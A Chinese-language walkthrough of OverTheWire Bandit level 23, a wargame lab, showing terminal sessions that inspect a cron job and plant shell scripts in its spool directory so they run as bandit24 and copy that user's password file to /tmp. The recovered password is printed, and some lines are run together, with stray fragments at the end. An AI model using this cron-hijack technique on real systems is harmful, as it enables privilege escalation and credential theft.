Wargames与bash知识15
Bandit23
基于时间的作业调度程序cron会定期自动运行一个程序。在/etc/cron.d/中查找配置,并查看正在执行的命令。
注意:此级别要求您创建自己的第一个shell脚本。这是一个很大的进步,当你达到这个水平时,你应该为自己感到骄傲!
注2:请记住,shell脚本一旦执行就会被删除,因此您可能需要保留一份副本…
推荐命令:
cron, crontab, crontab(5) (use “man 5 crontab” to access this)
```bash```bash
bandit23@bandit:~$ cd /etc/cron.d/
bandit23@bandit:/etc/cron.d$ ls -l
total 36
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit15_root
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 Oct 5 06:19 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 5 06:19 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 5 06:19 cronjob_bandit24
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit25_root
-rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
-rwx------ 1 root root 52 Oct 5 06:20 otw-tmp-dir
-rw-r--r-- 1 root root 396 Feb 2 2021 sysstat
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cd /usr/bin/
bandit23@bandit:/usr/bin$ ls -l cronjob_bandit*sh
-rwx------ 1 root root 142 Oct 5 06:19 cronjob_bandit15_root.sh
-rwx------ 1 root root 443 Oct 5 06:19 cronjob_bandit17_root.sh
-rwxr-x--- 1 bandit22 bandit21 130 Oct 5 06:19 cronjob_bandit22.sh
-rwxr-x--- 1 bandit23 bandit22 211 Oct 5 06:19 cronjob_bandit23.sh
-rwxr-x--- 1 bandit24 bandit23 384 Oct 5 06:19 cronjob_bandit24.sh
-rwx------ 1 root root 497 Oct 5 06:19 cronjob_bandit25_root.sh
bandit23@bandit:/usr/bin$ cat cronjob_bandit24.sh
#!/bin/bash #shebangmyname=$(whoami) #运行/var/spool/$myname/foo目录下的所有脚本,然后删除
cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
doif [ "$i" != "." -a "$i" != ".." ]; #排除目录.和..thenecho "Handling $i"owner="$(stat --format "%U" ./$i)"if [ "${owner}" = "bandit23" ]; thentimeout -s 9 60 ./$i #脚本运行60秒未退出发送信号9(SIGKILL )firm -f ./$ifi
done
脚本的目的是bandit24用户给用户bandit23留了一个“后门”,每分钟运行/var/spool/$myname/foo目录下,文件所有者是bandit23的所有脚本,如果脚本文件文件运行60秒未结束,发送信号9( SIGKILL)强制结束进程。
根据关卡提示、上面的脚本和以前的经验,我们可以写一个脚本将/etc/bandit_pass/目录下的密码文件bandit24的内容通过重定向保存在/tmp下
bandit23@bandit:~$ cd /var/spool
bandit23@bandit:/var/spool$ ls
bandit24 cron mail rsyslog
bandit23@bandit:/var/spool$ cd /etc/ba
bandit_pass/ bash_completion.d/
bandit23@bandit:/var/spool$ cd /etc/bandit_pass/
bandit23@bandit:/etc/bandit_pass$ ls
bandit0 bandit12 bandit16 bandit2 bandit23 bandit27 bandit30 bandit4 bandit8
bandit1 bandit13 bandit17 bandit20 bandit24 bandit28 bandit31 bandit5 bandit9
bandit10 bandit14 bandit18 bandit21 bandit25 bandit29 bandit32 bandit6
bandit11 bandit15 bandit19 bandit22 bandit26 bandit3 bandit33 bandit7
bandit23@bandit:/etc/bandit_pass$ cd /tmp
bandit23@bandit:/tmp$ ls
ls: cannot open directory '.': Permission denied
建立目录/tmp/bdit24
bandit23@bandit:/tmp$ mkdir bdit24
bandit23@bandit:/tmp$
bandit23@bandit:/tmp$ cd bdit24
使用nano编辑脚本
bandit23@bandit:/tmp/bdit24$ nano bd24
Unable to create directory /home/bandit23/.local/share/nano/: No such file or directory
It is required for saving/loading search history or cursor positions.bandit23@bandit:/tmp/bdit24$ ls
bd24
查看完成的脚本
bandit23@bandit:/tmp/bdit24$ cat bd24
#!/bin/bash
cat /etc/bandit_pass/bandit24 >/tmp/147258369
定时任务脚本cronjob_bandit24.sh使用的是 ./$i的方式运行的脚本,此种运行方法需要脚本有执行权限
bandit23@bandit:/tmp/bdit24$ chmod 755 bd24bandit23@bandit:/tmp/bdit24$ ls -l
total 4
-rwxr-xr-x 1 bandit23 bandit23 59 Jan 11 15:21 bd24
bandit23@bandit:/tmp/bdit24$ cp bd24 /var/spool/bandit24/
cp: cannot create regular file '/var/spool/bandit24/bd24': Operation not permitted
bandit23@bandit:/tmp/bdit24$ cd /var/spool
bandit23@bandit:/var/spool$ ls -l
total 12
dr-xr-x--- 3 bandit24 bandit23 4096 Oct 5 06:19 bandit24
drwxr-xr-x 3 root root 4096 Sep 19 02:19 cron
lrwxrwxrwx 1 root root 7 Sep 19 02:19 mail -> ../mail
drwx------ 2 syslog adm 4096 Dec 30 2021 rsyslog
bandit23@bandit:/var/spool$ cd bandit24
bandit23@bandit:/var/spool/bandit24$ ls
foo
bandit23@bandit:/var/spool/bandit24$ ls -l
total 4
drwxrwx-wx 44 root bandit24 4096 Jan 11 15:22 foo
bandit23@bandit:/var/spool/bandit24$ cd foo
bandit23@bandit:/var/spool/bandit24/foo$ ls
ls: cannot open directory '.': Permission denied
拷贝/tmp/bdit24/bd24到/var/spool/ bandit24/foo
bandit23@bandit:/var/spool/bandit24/foo$ cp /tmp/bdit24/bd24 .
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/147258369
cat: /tmp/147258369: No such file or directory
bandit23@bandit:/var/spool/bandit24/foo$ cd /tmp
bandit23@bandit:/tmp$ ls 147*
ls: cannot access '147*': No such file or directory
bandit23@bandit:/tmp$ ls
ls: cannot open directory '.': Permission denied
bandit23@bandit:~$ cat /tmp/147258369
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
定时任务一分钟执行一次。需要等待脚本运行
方法2:
此种方法的重点在于改变密码文件的权限,使bandit23用户有权读取。
bandit23@bandit:/home$ cd /etc/bandit_pass/
bandit23@bandit:/etc/bandit_pass$ ls -l *24
-r-------- 1 bandit24 bandit24 33 Oct 5 06:19 bandit24
bandit23@bandit:/etc/bandit_pass$ cd /tmp/bdit24
bandit23@bandit:/tmp/bdit24$ nano bd24
bandit23@bandit:/tmp/bdit24$ cp bd24 /var/spool/bandit24/foo/
bandit23@bandit:/tmp/bdit24$ cat bd24
#!/bin/bash
mkdir -p /tmp/2424/
cp /etc/bandit_pass/bandit24 /tmp/2424/
chmod 755 /tmp/2424/
chmod 644 /tmp/2424/bandit24
bandit23@bandit:/tmp/bdit24$ cd ../2424
-bash: cd: ../2424: No such file or directory
bandit23@bandit:/tmp/bdit24$ cd /tmp/2424
-bash: cd: /tmp/2424: No such file or directorybandit23@bandit:~$ cd /tmp/2424
bandit23@bandit:/tmp/2424$ ls
bandit24
bandit23@bandit:/tmp/2424$ cat bandit24
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
)
)
)
)
(负责注入的注解/全注解开发))
提交信息)
